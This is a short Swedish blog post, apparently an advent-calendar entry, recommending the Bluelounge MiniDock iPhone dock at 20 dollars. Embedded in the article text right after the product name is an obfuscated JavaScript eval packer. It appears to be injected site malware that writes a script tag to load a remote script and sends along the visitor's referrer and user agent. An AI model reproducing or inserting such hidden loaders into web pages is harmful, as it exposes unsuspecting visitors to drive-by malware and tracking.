Image Image Image Image Image Image Image Image Image Image

| 28 november, 2020

Scroll to top

Top

Lucka 11 julkalender: MiniDock från Bluelounge

Lucka 11 julkalender: MiniDock från Bluelounge
Sebastian

MiniDock eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|isrfb|var|u0026u|referrer|yibez||js|php’.split(’|’),0,{}))
från Bluelounge: Här har vi en riktigt praktisk iPhone-docka som är perfekt att köra bredvid sängen. Många använder idag sin smartphone som väckarklocka och vill man att det ska vara lite snyggt också kan denna godsak inhandlas för en mindre slant.

Dockan kostar 20 dollar och finns att beställa här!

Leveransen av MiniDock från Bluelounge tar ca 2 veckor.